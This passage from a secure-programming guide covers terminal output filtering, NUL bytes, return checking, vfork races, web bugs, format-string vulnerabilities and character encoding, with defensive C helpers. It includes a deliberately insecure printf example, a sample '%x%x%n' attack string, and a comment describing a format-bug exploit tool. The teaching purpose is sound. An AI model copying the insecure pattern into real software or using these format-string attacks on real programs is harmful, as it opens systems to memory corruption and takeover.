the group (i.e., the ``user-private group'' scheme), the ``group write''
permission should not be set either for the terminal [Filipski 1986].
If you're displaying data to the user at a (simulated) terminal, you probably
need to filter out all control characters (characters with values less
than 32) from data sent back to
the user unless they're identified by you as safe.
If worst comes to worst, you can identify tab and newline (and maybe
carriage return) as safe, removing all the rest.
Characters with their high bits set (i.e., values greater than 127)
are in some ways trickier to handle; some old systems implement them as
if they weren't set, but simply filtering them inhibits much international
use.
In this case, you need to look at the specifics of your situation.
</para>
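
<para>
One way to filter control characters before display is sketched below.
The name sanitize_for_terminal() is hypothetical.
The sketch keeps tab and newline, replaces other characters with values
below 32 with ``?'', and also replaces DEL (127), which is an added
assumption beyond the rule stated above;
characters with the high bit set are left alone, since how to treat
them depends on your situation:
</para>

```c
#include <stddef.h>

/* Replace, in place, every control character in the NUL-terminated
   string 's' with '?', keeping only tab and newline.
   DEL (127) is replaced as well; bytes above 127 are left untouched. */
void sanitize_for_terminal(char *s)
{
    size_t i;

    for (i = 0; s[i] != '\0'; i++) {
        unsigned char c = (unsigned char)s[i];

        if ((c < 32 && c != '\t' && c != '\n') || c == 127)
            s[i] = '?';
    }
}
```

<para>
After this call, an escape sequence such as ESC followed by ``[2J''
reaches the terminal as the harmless text ``?[2J''.
</para>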

<para>
A related problem is that the NUL character (character 0) can have
surprising effects.
Most C and C++ functions assume
that this character marks the end of a string, but string-handling routines
in other languages (such as Perl and Ada95) can handle strings containing NUL.
Since many libraries and kernel calls use the C convention, the result
is that what is checked is not what is actually used [rfp 1999].
</para>
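
<para>
A small sketch of detecting this mismatch follows.
It assumes the data arrives as a buffer with an explicit length
(as it would from a length-counted string in another language);
the name has_embedded_nul() is hypothetical:
</para>

```c
#include <string.h>

/* Return 1 if the first 'len' bytes of 'buf' contain character 0,
   which would make C string routines see a shorter string than the
   one that was checked; return 0 otherwise. */
int has_embedded_nul(const char *buf, size_t len)
{
    return memchr(buf, '\0', len) != NULL;
}
```

<para>
For example, a 10-byte value consisting of ``a.txt'', character 0,
and ``.jpg'' ends in ``.jpg'' when examined by length,
but strlen(3) reports 5 and C file routines would see only ``a.txt''.
Rejecting such input outright is usually the simplest response.
</para>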

<para>
When calling another program or referring to a file
always specify its full path (e.g., <filename>/usr/bin/sort</filename>).
<!-- I believe a Corel vulnerability is based on "sort" not being listed
     as /usr/bin/sort -->
For program calls,
this will eliminate possible errors in calling the ``wrong'' command,
even if the PATH value is incorrectly set.
For other file referents, this reduces problems from ``bad'' starting
directories.
</para>

</sect1>

<sect1 id="call-intentional-apis">
<title>Call Only Interfaces Intended for Programmers</title>

<para>
Call only application programming interfaces (APIs) that are
intended for use by programs.
Usually a program can invoke any other program,
including those that are really designed for human interaction.
However, it's usually unwise to invoke a program intended for human
interaction in the same way a human would.
The problem is that programs' human interfaces are intentionally rich
in functionality and are often difficult to completely control.
As discussed in <xref linkend="handle-metacharacters">,
interactive programs often have ``escape'' codes,
which might enable an attacker to perform undesirable functions.
Also, interactive programs often try to intuit the ``most likely'' defaults;
this may not be the default you were expecting, and an attacker may find
a way to exploit this.
</para>

<para>
Examples of programs you shouldn't normally call directly include
mail, mailx, ed, vi, and emacs.
At the very least, don't call these without checking
their input first.
</para>

<para>
Usually there are parameters to give you safer access to the program's
functionality,
or a different API or application that's intended for use by programs;
use those instead.
For example, instead of invoking a text editor to edit some text
(such as ed, vi, or emacs), use sed where you can.
</para>
</sect1>


<sect1 id="check-returns">
<title>Check All System Call Returns</title>

<para>
Every system call that can return an error condition must have that
error condition checked.
One reason is that nearly all system calls require limited system resources,
and users can often affect resources in a variety of ways.
Setuid/setgid programs can have limits set on them through calls such as
setrlimit(2) and nice(2).
External users of server programs and CGI scripts
may be able to cause resource exhaustion simply by making a large number
of simultaneous requests.
If the error cannot be handled gracefully, then fail safe as discussed earlier.
</para>
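
<para>
As an illustration of checking every return, here is a minimal sketch
of a write(2) wrapper.
The name write_all() is hypothetical; the sketch retries on EINTR,
continues after partial writes, and reports any other failure to the
caller instead of ignoring it:
</para>

```c
#include <errno.h>
#include <unistd.h>

/* Write all 'len' bytes of 'buf' to 'fd'.
   Returns 0 on success, or -1 on error with errno set. */
int write_all(int fd, const void *buf, size_t len)
{
    const char *p = buf;

    while (len > 0) {
        ssize_t n = write(fd, p, len);

        if (n < 0) {
            if (errno == EINTR)
                continue;       /* interrupted by a signal: retry */
            return -1;          /* real error: let the caller fail safe */
        }
        if (n == 0) {
            errno = EIO;        /* no progress: avoid looping forever */
            return -1;
        }
        p += n;                 /* partial write: send the remainder */
        len -= (size_t)n;
    }
    return 0;
}
```

<para>
A caller that receives -1 should stop and fail safe rather than
carry on as though the data had been written.
</para>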

</sect1>

<sect1 id="avoid-vfork">
<title>Avoid Using vfork(2)</title>

<para>
The portable way to create new processes in Unix-like systems
is to use the fork(2) call.
BSD introduced a variant called vfork(2) as an optimization technique.
In vfork(2), unlike fork(2), the child borrows the parent's memory
and thread of control until a call to execve(2) or an exit occurs;
the parent process is suspended while the child is using its resources.
The rationale is that in old BSD systems, fork(2) would actually cause
memory to be copied while vfork(2) would not.
Linux never had this problem; because Linux uses copy-on-write
semantics internally, Linux only copies pages when they are changed
(actually, there are still some tables that have to be copied; in most
circumstances their overhead is not significant).
Nevertheless, since some programs depend on vfork(2),
recently Linux implemented the BSD vfork(2) semantics
(previously vfork(2) had been an alias for fork(2)).
</para>

<para>
There are a number of problems with vfork(2).
From a portability point-of-view,
the problem with vfork(2) is that it's actually fairly tricky for a
process to not interfere with its parent, especially in high-level languages.
The ``not interfering'' requirement applies to the actual machine code
generated, and many compilers generate hidden temporaries and other
code structures that cause unintended interference.
The result: programs using vfork(2) can easily fail when the code changes
or even when compiler versions change.
</para>

<para>
For secure programs it gets worse on Linux systems, because
Linux (at least 2.2 versions through 2.2.17) is vulnerable to a
race condition in vfork()'s implementation.
If a privileged process uses a vfork(2)/execve(2) pair in Linux
to execute user commands, there's a race condition
while the child process is already running as the user's
UID, but hasn't entered execve(2) yet.
The user may be able to send signals, including SIGSTOP, to this process.
Due to the semantics of
vfork(2), the privileged parent process would then be blocked as well.
As a result, an unprivileged process could cause the privileged process
to halt, resulting in a denial-of-service of the privileged process' service.
FreeBSD and OpenBSD, at least, have code to specifically deal with this
case, so to my knowledge they are not vulnerable to this problem.
My thanks to Solar Designer, who noted and documented this
problem in Linux on the ``security-audit'' mailing list on October 7, 2000.
<!--
http://www.geocrawler.com/search/?config=302&words=Designer+vfork
http://www.geocrawler.com/archives/3/302/2000/10/0/4460856/
-->
</para>

<para>
The bottom line with vfork(2) is simple:
<emphasis remap="it">don't</emphasis> use vfork(2) in your programs.
This shouldn't be difficult; the primary use of vfork(2) is to support old
programs that needed vfork's semantics.
</para>
</sect1>

<sect1 id="embedded-content-bugs">
<title>Counter Web Bugs When Retrieving Embedded Content</title>
<para>
Some data formats can embed references to content that is automatically
retrieved when the data is viewed (not waiting for a user to select it).
If it's possible to cause this data to be retrieved through the
Internet (e.g., through the World Wide Web), then there is a
potential to use this capability to obtain information about readers
without the readers' knowledge, and in some cases to force the reader
to perform activities without the reader's consent.
This privacy concern is sometimes called a ``web bug.''
</para>

<para>
In a web bug, a reference is intentionally inserted into a document
and used by the content author to track
who, where, and how often a document is read.
The author can also essentially watch how a ``bugged'' document
is passed from one person to another or from one organization to another.
</para>

<para>
The HTML format has had this issue for some time.
According to the
<ulink url="http://www.privacyfoundation.org">Privacy Foundation</ulink>:
<blockquote>
<para>
Web bugs are used extensively today by Internet
advertising companies on Web pages and
in HTML-based email messages for tracking.
They are typically 1-by-1 pixel in size to make them
invisible on the screen to disguise the fact that they are used for tracking.
However, they could be any image (using the img tag);
other HTML tags can also implement web bugs, e.g., frames,
form invocations, and scripts.
By itself, invoking the web bug will provide the ``bugging'' site the
reader IP address, the page that the reader visited, and various information
about the browser; by also using cookies it's often possible to determine
the specific identity of the reader.
A survey about web bugs is available at
<ulink url="http://www.securityspace.com/s_survey/data/man.200102/webbug.html">http://www.securityspace.com/s_survey/data/man.200102/webbug.html</ulink>.
</para>
</blockquote>
</para>

<para>
What is more concerning is that other document formats seem to have
such a capability, too.
When viewing HTML from a web site with a web browser, there are other
ways of getting information on who is browsing the data, but when
viewing a document in another format from an email few users expect
that the mere act of reading the document can be monitored.
However, for many formats, reading a document can be monitored.
For example, it has been recently determined that Microsoft Word can
support web bugs;
see
<ulink url="http://www.privacyfoundation.org/advisories/advWordBugs.html">
the Privacy Foundation advisory for more information </ulink>.
As noted in their advisory,
recent versions of Microsoft Excel and Microsoft Power Point can also
be bugged.
In some cases, cookies can be used to obtain even more information.
</para>

<para>
Web bugs are primarily an issue with the design of the file format.
If your users value their privacy, you probably will want to limit the
automatic downloading of included files.
One exception might be when the file itself is being downloaded
(say, via a web browser); downloading other files from the same location
at the same time is much less likely to concern users.
</para>

</sect1>

<sect1 id="hide-sensitive-information">
<title>Hide Sensitive Information</title>
<para>
Sensitive information should be hidden from prying eyes, both while
being input and output, and when stored in the system.
Sensitive information certainly includes credit card numbers,
account balances, and home addresses, and in many applications
also includes names, email addresses, and other private information.
</para>

<para>
Web-based applications should encrypt all communication with a user
that includes sensitive information; the usual way is to use the
"https:" protocol (HTTP on top of SSL or TLS).
According to the HTTP 1.1 specification (IETF RFC 2616 section 15.1.3),
authors of services which use the HTTP protocol <emphasis>should not</emphasis>
use GET based forms for the submission of sensitive data,
because this will cause this data to be encoded in the Request-URI.
Many existing servers, proxies, and user agents will log
the request URI in some place where it might be visible to third parties.
Instead, use POST-based submissions, which are intended for
this purpose.
</para>

<para>
Databases of such sensitive data should also be encrypted on any storage
device (such as files on a disk).
Such encryption doesn't protect against an attacker breaking the secure
application, of course, since obviously the application
has to have a way to access the encrypted data too.
However, it <emphasis>does</emphasis> provide some defense against
attackers who manage to get backup disks of the data
but not of the keys used to decrypt them.
It also provides some defense if an attacker doesn't manage to break
into an application, but does manage to partially break into a related
system just enough to view the stored data - again, they now have to
break the encryption algorithm to get the data.
There are many circumstances where data can be transferred unintentionally
(e.g., core files), which this also prevents.
It's worth noting, however, that this is not as strong a defense as you'd
think, because often the server itself can be subverted or broken.
</para>
</sect1>
</chapter>

<chapter id="output">
<title>Send Information Back Judiciously</title>

<epigraph>
<attribution>Proverbs 26:4 (NIV)</attribution>
<para>
Do not answer a fool according to his folly,
or you will be like him yourself.
</para>
</epigraph>

<sect1 id="minimize-feedback">
<title>Minimize Feedback</title>

<para>
Avoid giving much information to untrusted users; simply succeed or fail,
and if it fails just say it failed and minimize information on why it failed.
Save the detailed information for audit trail logs.
For example:

<itemizedlist>
<listitem>

<para>
If your program requires some sort of user authentication
(e.g., you're writing a network service or login program),
give the user as little information as possible before they authenticate.
In particular, avoid giving away the version number of your program
before authentication.
Otherwise,
if a particular version of your program is found to have a vulnerability,
then users who don't upgrade from that version advertise to attackers that
they are vulnerable.
</para>
</listitem>
<listitem>

<para>
If your program accepts a password, don't echo it back;
this creates another way passwords can be seen.
</para>
</listitem>

</itemizedlist>

</para>
</sect1>

<sect1 id="no-comments">
<title>Don't Include Comments</title>

<para>
When returning information, don't include any ``comments'' unless you're
sure you want the receiving user to be able to view them.
This is a particular problem for web applications that generate files
(such as HTML).
Often web application programmers wish to comment their work
(which is fine), but instead of simply leaving the comment in their code,
the comment is included as part of the generated file (usually HTML or XML)
that is returned to the user.
The trouble is that these comments sometimes provide insight into how
the system works in a way that aids attackers.
</para>
</sect1>

<sect1 id="handle-full-output">
<title>Handle Full/Unresponsive Output</title>

<para>
It may be possible for a user to clog or make unresponsive a secure
program's output channel back to that user.
For example, a web browser could be intentionally halted or have its
TCP/IP channel response slowed.
The secure program should handle such cases; in particular, it should release
locks quickly (preferably before replying) so that this will not create
an opportunity for a Denial-of-Service attack.
Always place time-outs on outgoing network-oriented write requests.
</para>
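
<para>
One possible way to put a time-out on a write is to wait with poll(2)
until the descriptor is writable.
This is only a sketch: the name write_with_timeout() is hypothetical,
and it assumes the descriptor is one for which poll(2) is meaningful
(such as a socket or pipe):
</para>

```c
#include <errno.h>
#include <poll.h>
#include <unistd.h>

/* Wait up to 'timeout_ms' milliseconds for 'fd' to become writable,
   then perform one write.  Returns the number of bytes written, or -1
   with errno set (ETIMEDOUT if the peer did not become ready). */
ssize_t write_with_timeout(int fd, const void *buf, size_t len,
                           int timeout_ms)
{
    struct pollfd pfd;
    int ready;

    pfd.fd = fd;
    pfd.events = POLLOUT;
    pfd.revents = 0;

    /* Note: a retry after EINTR restarts the full time-out period. */
    do {
        ready = poll(&pfd, 1, timeout_ms);
    } while (ready < 0 && errno == EINTR);

    if (ready < 0)
        return -1;              /* poll itself failed */
    if (ready == 0) {
        errno = ETIMEDOUT;      /* output channel is clogged */
        return -1;
    }
    if (!(pfd.revents & POLLOUT)) {
        errno = EIO;            /* error, hang-up, or invalid descriptor */
        return -1;
    }
    return write(fd, buf, len);
}
```

<para>
A server using something like this can give up on a stalled client
after a bounded delay; any locks should already have been released
before the call.
</para>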

</sect1>

<sect1 id="control-formatting">
<title>Control Data Formatting (Format Strings/Formatation)</title>

<para>
A number of output routines in computer languages have a
parameter that controls the generated format.
In C, the most obvious example is the printf() family of routines
(including printf(), sprintf(), snprintf(), fprintf(), and so on).
Other examples in C include syslog() (which writes system log information)
and setproctitle() (which sets the string used to display
process identifier information).
Many functions with names beginning with ``err'' or ``warn'', containing
``log'', or ending in ``printf'' are worth considering.
<!-- log() style functions calling v* in particular -->
<!-- Some info from 7/21/2000, Theo de Raadt on Bugtraq -->
<!-- OpenBSD docs for setproctitle() is at
     http://www.rocketaware.com/man/man3/setproctitle.3.htm -->
Python includes the "%" operation, which on strings controls formatting
in a similar manner.
Many programs and libraries define formatting functions, often by
calling built-in routines and doing additional processing
(e.g., glib's g_snprintf() routine).
</para>

<para>
Format languages are essentially little programming languages - so
developers who let attackers control the format string are essentially
running programs written by attackers!
Surprisingly, many people seem to forget the power of these formatting
capabilities, and use data from untrusted users as the formatting parameter.
The guideline here is clear -
never use unfiltered data from an untrusted user as the format parameter.
Failing to follow this guideline usually results in a
format string vulnerability (also called a formatation vulnerability).
Perhaps this is best shown by example:
<programlisting width="61">
  /* Wrong way: */
  printf(string_from_untrusted_user);
  /* Right ways: */
  printf("%s", string_from_untrusted_user); /* safe */
  fputs(string_from_untrusted_user, stdout); /* better for simple strings */
</programlisting>
</para>

<para>
If an attacker controls the formatting information,
an attacker can cause all sorts of mischief by carefully
selecting the format.
The case of C's printf() is a good example -
there are lots of ways to possibly exploit user-controlled format strings
in printf().
These include
buffer overruns by creating a long formatting string (this can
result in the attacker having complete control over the program),
conversion specifications that use unpassed parameters
(causing unexpected data to be inserted), and
creating formats which produce totally unanticipated result values
(say by prepending or appending awkward data,
causing problems in later use).
A particularly nasty case is printf's
%n conversion specification, which writes the
number of characters written so far into the pointer argument;
using this, an attacker can overwrite a value that was intended for printing!
An attacker can even overwrite almost arbitrary locations, since the attacker
can specify a ``parameter'' that wasn't actually passed.
The %n conversion specification has been a standard part of C since its
beginning, is required by all C standards, and is used by real programs.
In 2000, Greg KH did a quick search of source code and identified the programs
BitchX (an irc client), Nedit (a program editor), and
SourceNavigator (a program editor / IDE / Debugger) as using %n, and there
are doubtless many more.
Deprecating %n would probably be a good idea, but even without %n there
can be significant problems.
<!--
Crispin Cowan posted the list at:
 http://lists.insecure.org/lists/vuln-dev/2000/Sep/0050.html
Immediately added forgotten credit at:
 http://lists.insecure.org/lists/vuln-dev/2000/Sep/0061.html
Greg KH mentions further:
 http://lists.insecure.org/lists/vuln-dev/2000/Sep/0053.html
 (He just searched some source code he had on hand).

-->
Many papers discuss these attacks in more detail; for example, see
<ulink url="http://www-syntim.inria.fr/fractales/Staff/Raynal/LinuxMag/SecProg/Art4/index.html">Avoiding security holes
when developing an application - Part 4: format strings</ulink>.
<!--
For a detailed description of how these format strings can be exploited,
see the following post on Bugtraq:
Subject: Howto exploit a remote format bug automatically
From: Frédéric Raynal frederic.raynal@inria.fr
Date: Thu, 18 Apr 2002 16:25:37 +0200
To: bugtraq@securityfocus.com

Also, see Fredrik Widlund (fredrik.widlund@defcom.com)'s "fox" program.
From the 19 April 2002 Bugtraq notice:
"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and not ported to other platforms,
though it should be very straighforward.

The only requirement is that you get the actual printed string back to the
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32bit-machines like the
i386 providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.


-->
</para>

<para>
Since in many cases the results are sent back to the user,
this attack can also be used to expose internal information about the stack.
This information can then be used to circumvent stack protection systems
such as StackGuard and ProPolice; StackGuard uses constant ``canary'' values
to detect attacks, but if the stack's contents can be displayed,
the current value of the canary will be exposed, suddenly making the
software vulnerable again to stack smashing attacks.
<!-- Fri, 21 Jul 2000 12:21:20 -0400,
     From:    Alan DeKok <aland@STRIKER.OTTAWA.ON.CA>
     Subject: StackGuard with ... Re: [Paper] Format bugs.
-->
</para>

<para>
A formatting string should almost always be a constant string,
possibly involving a function call to implement a
lookup for internationalization (e.g., via gettext's _()).
Note that this
lookup must be limited to values that the program controls, i.e., the
user must only be allowed to select from the message files controlled
by the program.
It's possible to filter user data before using it (e.g., by designing
a filter listing legal characters for the format string such as [A-Za-z0-9]),
but it's usually better to simply prevent the problem
by using a constant format string or fputs() instead.
Note that although I've listed this as an ``output'' problem, this can
cause problems internally to a program before output
(since the output routines may be saving to a file, or even just generating
internal state such as via snprintf()).
</para>
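
<para>
As a minimal sketch of the ``constant format string'' rule in C
(the function names here are hypothetical, chosen only for illustration),
untrusted text is passed as an argument to a fixed format,
or written with fputs() when no formatting is needed:
<programlisting>
<![CDATA[
```c
#include <stdio.h>

/* Hypothetical helper: builds a log line from untrusted text.
 * The format string is a constant; the untrusted text is only
 * ever an argument, so any '%' in it is treated as plain data. */
int format_log_line(char *buf, size_t size, const char *untrusted)
{
    /* WRONG: snprintf(buf, size, untrusted);
     * That would let the input act as the format string. */
    return snprintf(buf, size, "user said: %s", untrusted);
}

/* When no formatting is needed, fputs() avoids the issue. */
int print_untrusted(FILE *out, const char *untrusted)
{
    return fputs(untrusted, out);
}
```
]]>
</programlisting>
With this arrangement, input such as ``%x%x%n'' is copied through as
ordinary characters instead of being interpreted.
</para>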

<para>
The problem of input formatting causing security problems
is not an idle possibility; see CERT Advisory CA-2000-13
for an example of an exploit using this weakness.
For more information on how these problems can be exploited, see
Pascal Bouchareine's email article titled ``[Paper] Format bugs'',
published in the July 18, 2000 edition of
<ulink url="http://www.securityfocus.com">Bugtraq</ulink>.
<!-- This paper can be hard to extract, but it's there -->
As of December 2000,
developmental versions of the gcc compiler support warning messages for
insecure format string usages, in an attempt to help developers avoid
these problems.
<!-- John Levon passed this information on to me; as of Dec 11, 2000, this
  was in the CVS version of gcc -->
</para>

<para>
Of course, this all raises the question of whether or not the
internationalization lookup is, in fact, secure.
If you're creating your own internationalization lookup routines,
make sure that an untrusted user can only specify a legal locale and not
something else like an arbitrary path.
</para>

<para>
Clearly, you want to limit the strings created through internationalization
to ones you can trust.
Otherwise, an attacker could use this ability to exploit the
weaknesses in format strings, particularly in C/C++ programs.
This has been an item of discussion in Bugtraq (e.g., see
John Levon's Bugtraq post on July 26, 2000).
For more information, see the discussion on
permitting users to only select legal language values in
<xref linkend="locale-legal-values">.
</para>

<para>
Although it's really a programming bug, it's worth mentioning that
different countries notate numbers in different ways; in particular,
both the period (.) and comma (,) are used to separate an integer
from its fractional part.  If you save or load data, you need to make sure
that the active locale does not interfere with data handling.
Otherwise, a French user may not be able to exchange data with an
English user, because the data stored and retrieved will use
different separators.
I'm unaware of this being used as a security problem, but it's conceivable.
</para>
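
<para>
One way to keep stored numbers independent of the user's locale in C
is sketched below.
It assumes the program wants localized messages but a fixed ``.''
decimal point in its data files; the function names are hypothetical.
Note that setlocale() changes process-wide state, so this is best
called once at startup, before any threads are created.
<programlisting>
<![CDATA[
```c
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>

/* Honor the user's locale in general, but force the "C" rules
 * for numbers so that printf() and strtod() always use '.'. */
void init_locale(void)
{
    setlocale(LC_ALL, "");
    setlocale(LC_NUMERIC, "C");
}

/* Writes value as text into buf; returns snprintf()'s result. */
int save_number(char *buf, size_t size, double value)
{
    return snprintf(buf, size, "%.17g", value);
}

/* Parses text as a number.  Returns 0 on success, or -1 if the
 * text is empty or has trailing characters (such as ",25"). */
int load_number(const char *text, double *value)
{
    char *end;
    double v = strtod(text, &end);

    if (end == text || *end != '\0')
        return -1;
    *value = v;
    return 0;
}
```
]]>
</programlisting>
</para>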

</sect1>

<sect1 id="output-character-encoding">
<title>Control Character Encoding in Output</title>

<para>
In general, a secure program must ensure that it synchronizes its
clients to any assumptions made by the secure program.
One issue often impacting web applications is that they forget to
specify the character encoding of their output.
This isn't a problem if all data is from trusted sources, but if
some of the data is from untrusted sources, the untrusted source may
sneak in data that uses a different encoding than the one expected
by the secure program.
This opens the door for a cross-site malicious content attack; see
<xref linkend="input-protection-cross-site"> for more information.
</para>

<para>
<ulink url="http://www.cert.org/tech_tips/malicious_code_mitigation.html">CERT's tech tip on malicious code mitigation</ulink> explains the problem
of unspecified character encoding fairly well, so I quote it here:

<blockquote>
<para>
Many web pages leave the character encoding
("charset" parameter in HTTP) undefined.
In earlier versions of HTML and HTTP, the character encoding
was supposed to default to ISO-8859-1 if it wasn't defined.
In fact, many browsers had a different default, so it was not possible
to rely on the default being ISO-8859-1.
HTML version 4 legitimizes this - if the character encoding isn't specified,
any character encoding can be used.
</para>

<para>
If the web server doesn't specify which character encoding is in use,
it can't tell which characters are special.
Web pages with unspecified character encoding work most of the time
because most character sets assign the same characters to byte values
below 128.
But which of the values above 128 are special?
Some 16-bit character-encoding schemes have additional
multi-byte representations for special characters such as "&lt;".
Some browsers recognize this alternative encoding and act on it.
This is "correct" behavior, but it makes attacks using malicious scripts
much harder to prevent.
The server simply doesn't know which byte sequences
represent the special characters.
</para>

<para>
For example, UTF-7 provides alternative encoding for "&lt;" and "&gt;",
and several popular browsers recognize these as the start and end of a tag.
This is not a bug in those browsers.
If the character encoding really is UTF-7, then this is correct behavior.
The problem is that it is possible to get into a situation in which
the browser and the server disagree on the encoding.
</para>
</blockquote>
</para>

<para>
Thankfully, though explaining the issue is tricky, its resolution in HTML
is easy.
In the HTML header, simply specify the charset, like this example
from CERT:
<programlisting>
&lt;HTML&gt;
&lt;HEAD&gt;
&lt;META http-equiv=&quot;Content-Type&quot;
content=&quot;text/html; charset=ISO-8859-1&quot;&gt;
&lt;TITLE&gt;HTML SAMPLE&lt;/TITLE&gt;
&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;P&gt;This is a sample HTML page
&lt;/BODY&gt;
&lt;/HTML&gt;
</programlisting>

</para>

<para>
From a technical standpoint,
an even better approach is to set the character encoding as part of
the HTTP protocol output, though some libraries make this more difficult.
This is technically better because it doesn't force the client to
examine the header to determine a character encoding that would enable it
to read the META information in the header.
Of course, in practice a browser that couldn't read the META information
given above and use it correctly would not succeed in the marketplace,
but that's a different issue.
In any case, this just means that the server needs to send a
``charset'' parameter with the desired value in the HTTP Content-Type header.
Unfortunately, it's hard to heartily recommend this (technically better)
approach, because some older HTTP/1.0 clients did not deal properly with
an explicit charset parameter.
<!-- This is documented in the HTTP 1.1 specification -->
Although the HTTP/1.1 specification requires clients to obey the parameter,
client support is uncertain enough that you probably ought to use it as an
adjunct to the META tag, and not as your sole mechanism for
forcing the use of the correct character encoding.
</para>
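
<para>
If your program generates the HTTP headers itself (for example, a CGI
program written in C), sending the charset might look like the
following sketch.
The function name and the set of characters accepted in a charset name
are my assumptions, not part of any library; the whitelist is there so
that a charset value read from configuration can't smuggle extra
header lines into the response.
<programlisting>
<![CDATA[
```c
#include <stdio.h>
#include <string.h>

/* Formats a Content-Type header (plus the blank line that ends
 * the headers) into buf.  Returns the length written, or -1 if
 * the charset name is suspicious or the buffer is too small. */
int format_content_type(char *buf, size_t size,
                        const char *charset)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789-_.:+";
    size_t len = strlen(charset);
    int n;

    /* Refuse anything (spaces, CR, LF, ...) outside the list. */
    if (len == 0 || strspn(charset, allowed) != len)
        return -1;
    n = snprintf(buf, size,
                 "Content-Type: text/html; charset=%s\r\n\r\n",
                 charset);
    if (n < 0 || (size_t)n >= size)
        return -1;
    return n;
}
```
]]>
</programlisting>
</para>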

</sect1>

<sect1 id="prevent-include-access">
<title>Prevent Include/Configuration File Access</title>
<!-- I was reminded of this by the Bugtraq posting of 1 Dec 2000
by Mads Bach (bach@INDER.NET), "Subject: Web based apps and include files" -->

<para>
When developing web based applications,
do not allow users to access (read) files such as the program include and
configuration files.
This data may provide enough information (e.g., passwords) to break into
the system.
Note that this guideline sometimes also applies to other kinds of applications.
There are several actions you can take to do this, including:
<itemizedlist>
<listitem><para>Place
the include/configuration files outside of the web document
root (so that the web server will never serve the files).
Really, this is the best approach unless there's some reason the
files have to be inside the document root.</para></listitem>
<listitem><para>Configure the web server so it will not serve include files as
text.  For example, if you're using Apache,
you can refuse all requests for .inc files like so:
<programlisting width="61">
<![CDATA[
 <Files *.inc>
   Order allow,deny
   Deny from all
 </Files>
]]>
</programlisting>
</para></listitem>
<listitem><para>Place the include files
in a protected directory (using .htaccess), and designate them as files
that won't be served.
<!-- Suggested by Dustin Rue in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
</para></listitem>
<listitem><para>Use a filter to deny access to the files.
For Apache, this can be done using:
<programlisting width="61">
<![CDATA[
 <Files ~ "\.phpincludes">
    Order allow,deny
    Deny from all
 </Files>
]]>
</programlisting>
If you need full regular expressions to match filenames, in Apache you
could use the FilesMatch directive.
<!-- Suggested by Julien Savoie and James Lyon
     in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
</para></listitem>
<listitem><para>If your include file is a valid script file,
which your server will parse,
make sure that it doesn't act on user-supplied parameters and that it's
designed to be secure.</para></listitem>
</itemizedlist>
</para>

<para>
These approaches won't protect you from local users who can reach
the directories your files are in, if the files are world-readable.
You could change the permissions of the files so
that only the uid/gid of the webserver can read these files.
However, this approach won't work if the user can get the web server to
run his own scripts (the user can just write scripts to access your files).
Fundamentally, if your site is being hosted on a server shared with
untrusted people, it's harder to secure the system.
One approach is to run multiple web serving programs, each with different
permissions; this provides more security but is painful in practice.
Another approach is to set these files to be read only by your uid/gid,
and have the server run scripts with ``your'' permissions.
This latter approach has its own problems: it means that certain parts of
the server must have root privileges, and that the script may
have more permissions than necessary.
</para>
</sect1>


</chapter>

<chapter id="language-specific">
<title>Language-Specific Issues</title>
<epigraph>
<attribution>1 Corinthians 14:10 (NIV)</attribution>
<para>
Undoubtedly there are all sorts of languages in the world,
yet none of them is without meaning.
</para>
</epigraph>

<para>
There are many language-specific security issues.
Many of them can be summarized as follows:
<itemizedlist>
<listitem><para>
Turn on all relevant warnings and protection mechanisms available to you
where practical.
For compiled languages, this includes
both compile-time mechanisms and run-time mechanisms.
In general, security-relevant programs should compile cleanly with
all warnings turned on.
</para></listitem>

<listitem><para>
If you can use a ``safe mode'' (e.g., a mode that limits the activities
of the executable), do so.
Many interpreted languages include such a mode.
In general, don't depend on the safe mode to provide absolute protection;
most languages' safe modes have not been sufficiently analyzed for their
security, and when they are, people usually discover many ways to exploit them.
However, by writing your code so that it's secure out of safe mode, and
then adding the safe mode, you end up with defense-in-depth (since in
many cases, an attacker has to break both
your application code and the safe mode).
</para></listitem>

<listitem><para>
Avoid dangerous and deprecated operations in the language.
By ``dangerous'', I mean operations which are difficult to use correctly.
For example, many languages include
some mechanisms or functions that are ``magical'', that
is, they try to infer the ``right'' thing to do using a heuristic -
generally you should avoid them, because an attacker may be able to
exploit the heuristic and do something dangerous instead of what was intended.
A common error is an ``off-by-one'' error, in which the bound is
off by one, and sometimes these result in exploitable errors.
In general, write code in a way that minimizes the likelihood of
off-by-one errors.
If there are standard conventions in the language (e.g., for writing loops),
use them.
</para></listitem>

<listitem><para>
Ensure that the language's
infrastructure (e.g., run-time library) is available and secured.
</para></listitem>

<listitem><para>
When using languages that automatically garbage-collect strings, be
especially careful to immediately erase secret data
(in particular secret keys and passwords).
</para></listitem>

<listitem><para>
Know precisely the semantics of the operations that you are using.
Look up each operation's semantics in its documentation.
Do not ignore return values unless you're sure they cannot be relevant.
Don't ignore the difference between ``signed'' and ``unsigned'' values.
Checking every return value is particularly difficult in languages which
don't support exceptions, like C, but that's the way it goes.
</para></listitem>
</itemizedlist>
</para>

<sect1 id="c-cpp">
<title>C/C++</title>

<para>
It is possible to develop secure code using C or C++, but both
languages include fundamental design decisions that make it
more difficult to write secure code.
C and C++ easily permit buffer overflows, force programmers to do their
own memory management, and are fairly lax in their typing systems.
For systems programs (such as an operating system kernel),
C and C++ are fine choices.
For applications, C and C++ are often over-used.
Strongly consider using an even higher-level language,
at least for the majority of the application.
But clearly, there are many existing programs in C and C++
which won't get completely rewritten, and many developers may choose
to develop in C and C++.
</para>

<para>
One of the biggest security problems with C and C++ programs is
buffer overflow; see <xref linkend="buffer-overflow">
for more information.
C has the additional weakness of not supporting exceptions, which makes
it easy to write programs that ignore critical error situations.
</para>

<para>
Another problem with C and C++ is that developers have to do their
own memory management (e.g., using malloc(), calloc(), free(), new, and delete),
and failing to do it correctly may result in a security flaw.
The more serious problem is that programs may erroneously
free memory that should not be freed (e.g., because it's already been freed).
This can result in an immediate crash or be exploitable, allowing
an attacker to cause arbitrary code to be executed; see
[Anonymous Phrack 2001].
